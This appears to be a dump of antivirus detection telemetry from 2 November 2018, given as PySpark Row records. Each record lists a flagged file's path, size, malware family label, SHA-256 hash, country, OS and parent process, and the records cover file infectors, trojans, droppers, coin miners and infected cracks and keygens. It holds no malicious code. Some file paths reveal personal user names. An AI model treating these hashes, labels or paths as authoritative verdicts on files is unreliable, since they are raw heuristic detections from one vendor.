  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T07:44:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-02T15:33:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='$rnwj4qv.exe', filepath='\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3048583832-1740439486-1239720376-1001\\$RNWJ4QV.exe', filesize=128000, name='HEUR/AGEN.1033386.#M1.#R1'), hash='680fa2eadd5464cccda41161a653055390ff65d1c43507fd554ee67ee66e9b0c', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:41:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-074353-ee08c0f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c67b8277\\AVSCAN-20181031-082733-6D1FD0D0\\AVSCAN-20181102-074353-EE08C0F5', filesize=512000, name='PUA/FusionCore.Gen7.#M1.#R1'), hash='00eb83e0c976d7e8269c5e42ea02793dc98a4d07755dfe27a3c21c0a584418b8', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:44:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='F:\\JDownloader\\Yamicsoft.Windows.10.Manager.v2.3.5\\URET\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T14:01:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bin.scr', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\bin\\bin.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lmtools.exe', filepath='D:\\安装软件\\官方\\AUTOCAD_2008-64bit官方简体中文版(64位)安装版\\AutoCAD2008-64bit\\support\\nlm\\Program Files\\Autodesk Network License Manager\\lmtools.exe', filesize=1536000, name='W32/Ramnit.CD.#M1.#R1'), hash='098447b6cbe0e7f59220a452888a9de2947ba7325b363039b38b43db4541b6ad', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=677024, timestamp='2018-11-02T08:15:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:11:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2de2187224feda579125dc15840138845305e6ffd6aa64b56b8ec772ed353152', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2DE2187224FEDA579125DC15840138845305E6FFD6AA64B56B8EC772ED353152', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='2de2187224feda579125dc15840138845305e6ffd6aa64b56b8ec772ed353152', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:34:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='public.exe', filepath='C:\\Users\\X\\Public.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T03:10:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-051127-d515b701', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6122e679\\AVSCAN-20181103-044944-1F899F70\\AVSCAN-20181103-051127-D515B701', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:11:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vietnam.exe', filepath='D:\\الالعاب1\\حرب فيتنام\\Conflict.Vietnam.EgYuP.CoM.BY.P@WERNMAN\\Vietnam.exe', filesize=5632000, name='W32/Virut.Gen.#M1.#R1'), hash='2127e1194bf4e737e9f838b863a0274a880c98794295b01b8d45ae967a8c73b6', metadata=Row(cmdline='C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\gameux.dll,GameUXShim {72e3db8c-cf85-462c-8b0b-855360c82731};D:\\\\\\\\الالعاب1\\\\\\\\الموتسيكل المائي\\\\\\\\JETMOTO.EXE;744', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T13:22:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\3DMGAME-FIFA.19.Ulimate.Edition-3DM\\FIFA 19\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\3DMGAME-FIFA.19.Ulimate.Edition-3DM\\FIFA 19\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T10:52:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iocd76b9a6c-6d6c-6246-b9f6-587a8b49532b.exe', filepath='C:\\programdata\\kaspersky lab\\avp18.0.0\\temp\\iocD76B9A6C-6D6C-6246-B9F6-587A8B49532B.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T20:27:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:38:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T15:25:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081109-3f984ed7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ac08dd3\\AVSCAN-20181102-081056-3D920FC8\\AVSCAN-20181102-081109-3F984ED7', filesize=232000, name='HEUR/AGEN.1031614.#M1.#R1'), hash='0cdcb40b28416b55bd01d4cc98e457174bfa8fdde5f50bacbf3c60aa116b056b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:11:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xuetr.exe', filepath='E:\\HBCD\\Programs\\XueTr.exe', filesize=64000, name='TR/Siggen.64000.12.#M1.#R1'), hash='01bb8e327211e5fff9594e791c0abb322f765b94a3d0400e7eec9dad68e3310e', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054719-bb7ddac6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054719-BB7DDAC6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050341-a341abf0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050341-A341ABF0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055245-7dea6fcd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055245-7DEA6FCD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054252-1c036951', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054252-1C036951', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-093212-d4e68824', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_06cb0b18\\AVSCAN-20181102-093105-CC663E58\\AVSCAN-20181102-093212-D4E68824', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:32:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144132-5b10b91c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca086aae\\AVSCAN-20181102-144033-54B6A5F0\\AVSCAN-20181102-144132-5B10B91C', filesize=20000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='6311b05ecddcd0a31e8eeb7ebda701d6257f0a161a2cce498ef7bc517d1a822a', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:41:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wordpad.exe', filepath='C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe', filesize=4608000, name='TR/Patched.Gen.#M300.#R5151'), hash='5ca0f842cd966b89bac425252e088553e5d6e192e7ecabfd760abbaafdb50b37', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-02T23:25:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='D:\\# Andromeda Backup\\2018-10\\Downloads\\Setup\\msimg32.dll', filesize=5696000, name='TR/CoinLoader.JY.#M1.#R1'), hash='517be7d335a0593e425740975aacd37de9dd347a705a6862ce20b2e03ffe9622', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe4_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=346112, timestamp='2018-11-02T23:31:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-232424-19e7d511', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d9d377eb\\AVSCAN-20181102-232333-15055F89\\AVSCAN-20181102-232424-19E7D511', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:26:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052544-b78c2148', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052544-B78C2148', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-175708-20db143e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_065aeb1d\\AVSCAN-20181102-175326-0480FD63\\AVSCAN-20181102-175708-20DB143E', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:57:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053935-a6944a7e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053935-A6944A7E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='copy of diehard.exe', filepath='D:\\أفلام أجنبي\\العاب\\حرب مسدسات\\Copy of diehard.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='729b18da30c0363f4b8c6ac3d53bb143e4fec1017e387b3c0c2ac68fbe74b892', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T11:46:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-190742-7130682c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ae272576\\AVSCAN-20181102-190557-60FA6A79\\AVSCAN-20181102-190742-7130682C', filesize=1792000, name='ADWARE/OffersWizard.1792000.#M1.#R1'), hash='68a5b5b209642b4dc351172859cb0cb7cdc19e6cdcbebc49be2b1209ea99e657', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:07:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rhino.6-patch.exe', filepath='c:\\users\\X\\desktop\\rhino.6-patch.exe', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T18:09:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pm70.exe', filepath='C:\\Users\\jsr\\Desktop\\Pm70.exe', filesize=5632000, name='W32/Sality.AT.#M0.#R0'), hash='65c3e5d7ac39da386dda09d5808b4d381d2454885f3b5729c24f2e7cc5fefedb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:19:29Z'), dt=datetime.date(2018, 11, 2)),
